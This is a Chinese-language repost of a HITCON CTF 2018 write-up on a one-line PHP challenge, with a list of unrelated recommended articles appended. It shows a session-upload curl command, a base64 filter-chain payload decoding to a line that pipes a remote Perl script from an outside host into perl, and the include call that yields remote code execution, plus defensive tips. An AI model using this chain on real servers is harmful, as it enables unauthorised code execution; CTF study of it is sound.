HITCON CTF 2018 - 单行PHP挑战:会话上传与流过滤器链的极致利用

HITCON CTF 2018 - 单行PHP挑战

这是Orange带来的技术分享 :)

挑战背景

在每年HITCON CTF中,我都会设计至少一个PHP漏洞利用挑战,其特点是源码极其简洁(通常只有几行),但利用难度极高。本次挑战是历年最短的一个------仅含单行PHP代码,运行在默认安装的Ubuntu 18.04 + PHP7.2 + Apache环境。

核心技术点

  1. 会话上传进度控制

    利用session.upload_progress特性(默认启用)向SESSION文件注入可控内容:

    bash 复制代码
    curl http://target/ -H 'Cookie: PHPSESSID=iamorange' \
      -F 'PHP_SESSION_UPLOAD_PROGRESS=payload' -F 'file=@/etc/passwd'
  2. 流过滤器链绕过

    通过多级base64解码过滤器处理前缀污染:

    php 复制代码
    php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange
  3. 竞态条件利用

    对抗session.upload_progress.cleanup的自动清理机制(默认开启),通过快速竞争或大文件上传维持会话。

漏洞利用过程

  1. 构造特殊base64载荷,经过三级解码后生成有效PHP代码:

    php 复制代码
    原始:VVVSM0wyTkhhSGRKUjBKcVpGaEtjMGxIT1hsWlZ6VnVXbE0xTUdSNU9UTk1Na3BxVEc1Q2MyWklRbXhqYlhkblRGZEJOMUI2TkhaTWVUaDJUSGs0ZGt4NU9IWk1lVGgy
    解码后:@<?php `curl orange.tw/w/bc.pl|perl -`;?>/////////////
  2. 结合会话文件包含漏洞实现RCE:

    php 复制代码
    include('php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange');

防御建议

  • 禁用session.upload_progress功能
  • 设置open_basedir限制文件访问范围
  • 对会话文件路径进行随机化处理
相关推荐
shuououo34 分钟前
YOLOv4 核心内容笔记
人工智能·计算机视觉·目标跟踪
DO_Community4 小时前
普通服务器都能跑:深入了解 Qwen3-Next-80B-A3B-Instruct
人工智能·开源·llm·大语言模型·qwen
WWZZ20254 小时前
快速上手大模型:机器学习3(多元线性回归及梯度、向量化、正规方程)
人工智能·算法·机器学习·机器人·slam·具身感知
deephub4 小时前
深入BERT内核:用数学解密掩码语言模型的工作原理
人工智能·深度学习·语言模型·bert·transformer
PKNLP4 小时前
BERT系列模型
人工智能·深度学习·bert
兰亭妙微5 小时前
ui设计公司审美积累 | 金融人工智能与用户体验 用户界面仪表盘设计
人工智能·金融·ux
AKAMAI6 小时前
安全风暴的绝地反击 :从告警地狱到智能防护
运维·人工智能·云计算
岁月宁静6 小时前
深度定制:在 Vue 3.5 应用中集成流式 AI 写作助手的实践
前端·vue.js·人工智能
galaxylove6 小时前
Gartner发布数据安全态势管理市场指南:将功能扩展到AI的特定数据安全保护是DSPM发展方向
大数据·人工智能
格林威6 小时前
偏振相机在半导体制造的领域的应用
人工智能·深度学习·数码相机·计算机视觉·视觉检测·制造